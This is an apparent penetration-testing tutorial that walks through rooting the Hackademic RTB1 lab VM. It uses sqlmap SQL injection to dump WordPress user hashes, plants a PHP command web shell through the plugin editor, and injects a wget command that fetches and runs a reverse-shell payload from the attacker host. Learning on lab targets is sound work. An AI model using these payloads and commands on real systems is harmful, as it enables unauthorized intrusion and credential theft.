Application Security Testing Tutorial via Rooting Hackademics RTB1
Author: Hunter Gregal
Hackademic Root The Box 1 is a vulnerable virtual machine that can be found on vulnhub.com. The goal is to exploit the machine and read the key.txt file in the root home directory. As far as root-the-box challenges go, Hackademic.RTB1 is on the easier side which is why I often recommend this as a starting point for engineers who are looking to get into the penetration testing scene. Once downloaded and loaded up into your preferred virtualization environment it’s time to start hacking away!
The best way to begin most (I emphasize most, not all) vulnhub root-the-box (RTB) or boot2root challenges is to do a sweep of your network for webservers. Often RTB virtual machines will be running a vulnerable web server which is a nice piece of information to isolate your target from any other machines that may be on your network. This is also assuming you have placed the virtual machine network adapter into bridged mode.
In this case I have used Vmware Workstation to host my Hackademic.RTB1 virtual machine on which means that I am going to be looking for not only a webserver, but a webserver that has a Vmware manufactured network interface card. (If using VirtualBox the network interface card manufacture will most likely be Cadmus) With this information, let’s use the Nmap command below to locate our target and to only show machines with a Vmware MAC address.
nmap -T4 -sV -v -p 80 192.168.60.0/24 | grep -B 5 "Vmware"
Now we have an IP address for our Hackdemic.RTB1 machine and can begin to gather intelligence on it. Using the Nmap command below, we can gather more information on what services this machine is running.
Looks like there are two discovered ports: an Apache 2.2.15 web server on port 80, and a closed port 22.
Port 22 will not be of much use, so let’s check out the webserver. Navigating to http://192.168.60.31/ greets us with a message pointing to http://192.168.60.31/Hackdemic.RTB1/ to begin the challenge.
With little to no content on this page, it’s time to jump over to Kali to run some additional tests. Using dir-buster (dirb) we can discover directories present on the webserver. I like to begin with dirb to enumerate directories and then move on to using wfuzz with a larger wordlist if dirb doesn’t yield good results. Below is the output from the dirb scan.
It looks like the webserver is running WordPress judging by the presence of the standard wp-* directories. What’s interesting is that these directories are indexed for viewing. However, viewing each of these directories doesn’t seem to lead to any entry points. It is interesting to note that there are some plugin files that have been placed in http://192.168.60.31/Hackademic_RTB1/wp-content/plugins/
Doing some research on this vulnerability, we can find that the vulnerable URL should be at http://192.168.60.31/Hackademic_RTB1/?cat=. For a quick test let’s throw an apostrophe in >:)
Uh oh, it looks like we have an error in our SQL syntax! This is good news, it looks like this WordPress is indeed vulnerable to SQL injection. Using SQLmap we can leverage this vulnerability to dump the current tables in the SQL database.
First, let’s identify the databases:
./sqlmap.py -u http://192.168.60.31/Hackademic_RTB1/?cat\=1 –dbs
We have information_schema, mysql, and wordpress databases.
Let’s see what tables the wordpress database has in it:
./sqlmap.py -u http://192.168.60.31/Hackademic_RTB1/?cat\=1 -D wordpress --tables
Let’s see what columns the wp users table has in it:
./sqlmap.py -u http://192.168.60.31/Hackademic_RTB1/?cat\=1 -D wordpress -T wp_users --columns
Users and passwords : ) — Now, for the final dump…
./sqlmap.py -u http://192.168.60.31/Hackademic_RTB1/?cat\=1 -D wordpress -T wp_users -C user_level,user_login,user_pass --dump
What’s nice about sqlmap is that it will offer to crack the password hashes that it finds. Using the rockyou.txt wordlist provided with Kali we successfully crack multiple user passwords. Notice that the user GeorgeMiller has a user_level of 10 which is admin level in WordPress.
Now it’s time to login as admin to the “/Hackademic_RTB1/wp-admin/” WordPress site and see if we cannot find a way to get a system shell. (note: my DHCP lease was renewed at this point so my Hackademic.RTB1 box will have a different IP from this point on.) Once logged in, we can do some poking around and eventually notice that there is a plugin editor…
It appears that we can modify the code for the plugins, which if we recall, are located in the /wp-content/plugins/ directory. We have a few options at this point on how we can elevate this remote code execution to a full-fledged system shell…but let’s take this a step further and set things up so that we can pop into a Meterpreter shell as the webserver user. First, we will use a very basic PHP command shell to provide us an injection point to run system commands on the target machine. (Note: I choose to upload a PHP shell instead of a Metasploit payload first in order to provide a persistent backdoor in the event the Metasploit payload fails)
The PHP code:
$cmd = ($_REQUEST["cmd"]);
echo "</pre>$cmd<pre>"; die;
Clicking update file informs us that we cannot edit the “Hello Dolly” plugin, so let’s try the others. Thankfully, we can successfully turn the textfile1.php file into a PHP shell.
We can now use http://192.168.60.50/Hackademic_RTB1/wp-content/plugins/textfile1.php?cmd= to inject system commands under the current webserver user.
It is now time to use some Metasploit magic to pop a Meterpreter shell. We will begin by using msfvenom to generate a reverse PHP shell payload
Next we will uncomment the payload, and start up the webserver on the Kali box.
Then let’s jump into msfconsole and start a reverse handler…
Finally let’s use our PHP shell we set up earlier to download and execute our payload.
Command to inject into PHP shell:
wget http://192.168.60.11/payload.txt -O /tmp/payload.php;php -f /tmp/payload.php
Unfortunately we only have a shell as the webserver user, we must elevate this to root. In this case I chose to try different privilege escalation modules in Metasploit in which I got lucky and found one that the target was vulnerable to. The screenshots below show the exploitation using the proper pkexec race condition privilege escalation vulnerability and the successful reading of the key in the root directory: